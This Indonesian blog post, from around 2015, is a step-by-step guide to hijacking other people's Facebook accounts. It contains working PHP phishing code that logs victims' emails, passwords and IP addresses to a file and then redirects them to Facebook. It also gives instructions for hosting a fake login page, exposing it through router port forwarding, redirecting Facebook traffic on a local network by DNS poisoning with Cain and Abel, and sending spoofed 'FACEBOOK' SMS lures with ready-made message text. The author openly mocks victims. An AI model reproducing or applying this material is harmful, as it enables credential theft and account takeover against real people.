Tips Trik cara hack Facebook terbaru 2015

Di Facebook banyak yang menanyakan bagaimana cara hack Facebook dan kali ini saya akan meng upload cara hack Facebook ada 4 cara yang akan saya share di blog ini silakan di simak

 

step 1 teknik phising

 

Teknik Phising merupakan teknik yang memanfaatkan kebodohan koraban dengan membuat halaman login mirip seperti Facebook dang meng-upload nya ke website yang kita buat kalau anda penasaran cara buat Web Phising ikutin langka-langkah berikut ini.

1. Buatlah sebuah web dari Idhosting atau 000webhost dan semacamnya lah jika sudah punya web silakan lewati saja langkah pertama ini

2.Buka halaman awal Login Facebook

3.Klik kanan dan klik View Page Source dan akan terbuka jendela baru tekan CTRL+F  dan cari tulisan berikut  https://www.facebook.com/login.php?login_attempt=1 dan rubah menjadi Logs.php

4.Tekan CTRL+A lalu tekan CTRL+C dan di copy di notepad lalu di save dengan format All Files dengan nama Index.PHP

5.Jika sudah di save silakan copy script berikut ke notepad

 

<?php $file = "password.txt"; $username = $_POST['email']; $password = $_POST['pass']; $ip = $_SERVER['REMOTE_ADDR']; $today = date("F j, Y, g:i a"); $handle = fopen($file, 'a'); fwrite($handle, "+++++++++++++++++++++++++++++++++++++++++++++++++ +++"); fwrite($handle, "\n"); fwrite($handle, "Email: "); fwrite($handle, "$username"); fwrite($handle, "\n"); fwrite($handle, "Password: "); fwrite($handle, "$password"); fwrite($handle, "\n"); fwrite($handle, "IP Address: "); fwrite($handle, "$ip"); fwrite($handle, "\n"); fwrite($handle, "Date Submitted: "); fwrite($handle, "$today"); fwrite($handle, "\n"); fwrite($handle, "+++++++++++++++++++++++++++++++++++++++++++++++++ +++"); fwrite($handle, "\n"); fwrite($handle, "\n"); fclose($handle); echo "<script LANGUAGE=\"JavaScript\"> <!-- window.location=\"https://login.facebook.com/login.php?login_attempt=1\"; // --> </script>"; ?>

6.Dan save dengan format All Files dengan nama Logs.php

7.Selanjutnya anda buka notepad dan save dengan nama Passwor nb:kita membuat notepad password tanpa isinya itu berguna untuk menyimpan password korban yang kena tipu

8.Sekarang anda harus membuka 000webhost.com atau idhostinger.com yang penting buka website jasa pembuat website lalu login dengan akun yang sudah anda buat tadi.

9.Klik Create New untuk membuat website pertama anda

10.Silakan anda isi formulir nya or, I will choose your free subdomain (recommended) silakan anda isi dengan alamat url anda dan Choose Password: silakan anda isi dengan password yang anda ingin buat jika sudah silakan klik Seetup New Account 

11.Klik Go To Panel

12.Sekarang anda klik File Manager.

 13.Nanti akan muncul tab baru silakan anda klik tab tersebut dan silakaan anda isi kolom password dengan password yang anda buat tadi.

14.Sekarang anda klik Public.HTML lalu beri tanda centang pada Default.php dan klik Delete

 15.Klik tanda centang yang berwarna hijau jika sudah di klik silakan klik tanda panah yang berwarna biru

16.Klik Upload 

 17.Dan anda klik Browse silakan anda cari di mana tempat anda meng-save script yang tadi di buat dan upload juga notepad yang kosong yang bernama password

18.Silakan anda cara di mana tempat anda meng-save scriptnyasebagai contoh saya meng-save nya di phising Fcaebook

 

19.Lalu klik tanda ceklias yang berwarna hijau dan klik centang warna hijau kembali tetapi yang paling atas 

20.Klik tanda panah warna biru untuk kembali ke home

21.Dan beri tanda centang pada Password lalu klik Chmod jika tidak tau di mana berada Chmod silakan anda lihat gambar berikut

22.Jika sudah anda klik silakan anda ganti Chmod value  dari angka 644 menjadi 777 nb:Merubah Chmod Value menjadi 77 adalah untuk agar bisa meng-save password korban

23.Lalu klik tanda centang yang berwarna hijau

24.Jika sudah silakan anda keluar dari tab Net3ftp dan coba buka web phising buatan kamu

 25.Dan ini dia penampakan web phsing punya ane sob

26.Dan coba masukkan email dan password sebagai percobaan apakah web phising anda berfungsi atau tidak.Jika sudah anda isi silakan login kembali dan klik File manager dan masukkan password yang anda buat tadi.

27.Buka PUBLIC.HTML dan beri tanda centang pada password dan klik View 

28.Nanti akan di perlihatkan password dan email korban yang sudah kena jebak web phsing buatan anda

Itu trik pertama yaitu teknik web phising yang memanfaatkan kebodohan korban

 

Step 2 : Buat Server FAKE LOGIN Sendiri Tanpa Hosting Apapun!

Langkah kedua ini emang agak rumit sedikit, tapi mudah kok :D silahkan ikuti dibawah ini

1.masuk ke default router anda masing2(biasanya 192.168.1.1 tapi kalau beda coba diliat di cmd-ipconfig liat default routernya)

2. masukan id pass(biasanya id:password = admin:admin)

3.lalu masuk advance option - virtual server - NAT. oh iya mungkin setiap router berbeda2, tapi PASTI ada pilihan untuk virtual server, anda tinggal mencari2 pokoknya tampilannya kira2 seperti ini

 

4. lalu setelah ketemu, isi sama seperti gambar diatas! yang harus sama adalah yang diberi tanda panah! ingat jangan sampai salah!

oh iya di kolom ip, kamu tulis ip LOCALmu, caranya tinggal buka run - cmd - ipconfig (mengapa IP local ? karena disini untuk mendeteksi localhost, BUKAN karena nantinya hanya bisa dibuka di dalam jaringan! tapi tetep bisa dibuka diluar jaringan manapun!)

5. setelah itu klik save

Okay, sampai disini kita telah membuat server + fake login sendiri,,! untuk mengecek server kita berjalan atau tidak silahkan buka http://www.whatsmyip.org/, misal ip nya 164.57.99.99, sekarang buka browser di HP(pastikan pake paket! jgn wifimu) lalu buka url 164.57.99.99, nanti akan muncul script fake login anda. nah sampai sini jika kita HANYA menyuruh orang untuk masuk ke 164.57.99.99 pasti org gak akan percaya! yah mungkin sepintar2nya kita bilang ke orang itu, tetep aja orang akan berpikir 2x mengapa kok urlnya seperti itu! mungkin hanya 50% orang yang membukanya, dan 30% orang yang memasukan email dan password.. pasti kurang maksimal!, lalu bagaimana caranya memastikan org tersebut agar dapat membuka url itu ? ikuti langkah ketiga

Step 3 : Mengganti DNS Facebook !

UPDATE : ternyata sekarang facebook udah gak bisa di DNS Poisoning lagi. lalu gimana solusinya ? kalau anda mau silahkan dns poisoning semua website dengan android saja yaitu menggunakan aplikasi bernama network spoofer yang tutorialnya dapat dilihat disini kalau memang anda bener2 berhasil dns poisoning semua website kecuali facebook, berarti gak perlu lagi untuk mengikuti step ke 4 yaitu sms masking.

  Cara ini sering dikenal dengan DNS Poisoning, Sebelumnya saya ingatkan DNS Poisoning ini hanya berjalan di satu jaringan. Jadi kalau kalian rasa target anda bukan teman sekolah / teman wifi / teman dekat melainkan teman jauh yang sangat jarang ketemu, mendingan langsung ke langkah 4. maka kemungkinan berhasil akan berkurang 10% :'( tapi bagi yang memang bener2 teman sekolah / teman wifi / teman dekat kalian / sahabat kemungkinan berhasil yang tadinya cuman 50% akan menjadi 80% dengan cara berikut :

oh iya, logikanya aja kalau kompi/laptop agan yang satu untuk server (jangan dipindah2 nanti web fakeloginnya bisa hilang) pasti kita butuh 1 perangkat lagi untuk meracuni DNS di suatu jaringan target, nah jika kalian punya 2 laptop yang satu untuk DNS poisoning sih gak masalah, atau ada komputer yang terhubung dengan jaringan target gak masalah. lalu kalau anda cuman punya 1 laptop/komputer dimana laptop/komputer tersebut digunakan untuk server tadi, maka anda hanya perlu android! dan gak usah ikutin cara ini, melainkan ikuti video ini  tapi kalau anda punya 2 laptop/komputer yang terhubung dengan jaringan silahkan ikuti langkah berikut :

1.download cain dan able disini http://downloads.ziddu.com/download/24907419/Cain-and-Abel.exe.html

 2.install seperti biasa

3. buka cain

4.pilih menu sniffer, lalu pilih configure, lalu pilih adapter yang anda gunakan

5.klik active/deactive sniffer, agar sniffer aktif

6.klik kanan pada area kosong lalu pilih scan mac address lalu pilih "all host in my subnet" lalu ok

7. klik tab APR

8. klik + pada bagian atas, kalau masih disable, klik aja bagian kosong

9.lalu pilih dan klik ip address gateway anda panel sebelah kiri

10. lalu pada panel sebelah kanan adalah korban kita, anda bisa memilih lebih dari satu, saya sarankan mending semua :D lalu ok

11. setelah itu kembali ke tampilan awal, lihat pada bagian kiri pilih APR-DNS lalu klik lagi tanda +

  12.lalu masukan DNS Name Requestnya yaitu :

www.facebook.com

13. lalu masukan IP Address to rewrite bla bla bla :

(ip address yang tadi), tadi saya pakai contoh 164.57.99.99

14. lalu tekan OK

  15.lalu pilih tanda + lagi, setelah itu masukan DNS Name Requestnya yaitu :

www.facebook.com/recover

16. lalu masukan IP Address to rewrite bla bla bla :

(ip address yang tadi), tadi saya pakai contoh 164.57.99.99

18.lalu tekan OK

19.setelah itu klik tombol pada gambar dibawah ini untuk mengaktifkannya

 

 

  sampai pada tahap ini kemungkinan besar si target membuka facebook.com, walaupun di url www.facebook.com tetapi halamannya adalah halaman fake login yang telah kita buat tadi:D

lalu bagaimana jika korban tetep gak percaya? ikuti langkah keempat !

Step 4 : Memancing Target Dengan Masking SMS

Sudah tau masking sms ? masking sms adalah sms dimana nomor pengirim disembunyikan menjadi nama tertentu bebas anda mau memberi nama apa.. nah lalu bagaimana jika anda mendapat sms dari "FACEBOOK" bahwa password account anda telah terganti sendiri? anda pasti akan kaget dan langsung mengikuti apa yang harus dilakukan! itu saja baru tiba2 keganti passwordnya, disini anda bisa mengkreasikan sendiri kata2 anda untuk memancing korban. ok langsung saja caranya masking sms seperti ini
- Oh iya, sebelum saya ajarkan Masking SMS, saya ingatkan bahwa Masking SMS sangat berbahaya sekali dan sangat rentan untuk berbuat kejahatan, jadi saya anjurkan untuk menggunakannya dengan bijak sekali, saya gak bertanggung jawab atas apa yg kalian perbuat untuk kejahatan!
- sekarang masuk ke http://lifetimesms.com/signup.php
- daftar seperti biasa lalu login dengan password yang telah anda terima di nomor hp anda
INGAT! website ini hanya menyediakan 2x sms masking gratis! jadi jangan langsung sembarangan mengirim SMSnya!
- lalu saya agak lupa menunya, pokoknya cari aja send sms
- nah, disini kita tulis pengirimnya "FACEBOOK", targetnya adalah nomor korban, lalu isi dari pesan tersebut kira-kira seperti ini :
untuk tanpa dns poisoning
"Your Account was blocked as spam on Facebook. If you do not feel spam, please open this url to recover your account. URL : 167.57.99.99"
untuk yang menggunakan dns poisoning
"Your Account was blocked as spam on Facebook. If you do not feel spam, please open this url to recover your account. URL : www.facebook.com/recover"

mengapa jika kita menggunakan dns poisoning kita harus mengirim pesan dengan isi dimana si target harus menuju ke www.facebook.com/recover ? karena dns poisoning berfungsi untuk mengalihkan halaman www.facebook.com menjadi halaman fake login kita, tetapi urlnya tetep www.facebook.com

ok, dari sekian proses mungkin hanya SEDIKIT kemungkinan untuk gagal ! kemungkinan tsb terjadi jika ternyata si korban juga otaknya pinter,"mana ada saya spam nih pasti ulah hacker yang sok2an pake dns poisoning" tapi jarang terjadi, kebanyakan orang pasti panik..

satulagi dari saya, setelah anda membaca tutorial ini, saya mohon dengan sangat :

"jangan ada lagi yang ngemis2 minta tolong hacking facebook orang, pikirlah pakai otak bahwa hack facebook itu gak semudah membalik telapak tangan tetapi harus penuh usaha. lagipula hack facebook orang itu lebih mudah apabila anda sudah kenal orangnya, bukannya suruh saya untuk hackin fbnya.. emg saya kenal.. jadi jangan ngemis2 lagi!"

 

 

 

 

 

 

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, dengan begitu Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di Blog Rangga

Jika Anda menyukai Artikel di blog ini, Silahkan klik disini untuk berlangganan gratis via email, Anda akan mendapat kiriman artikel setiap ada artikel yang terbit di MEZAN CREATIVITY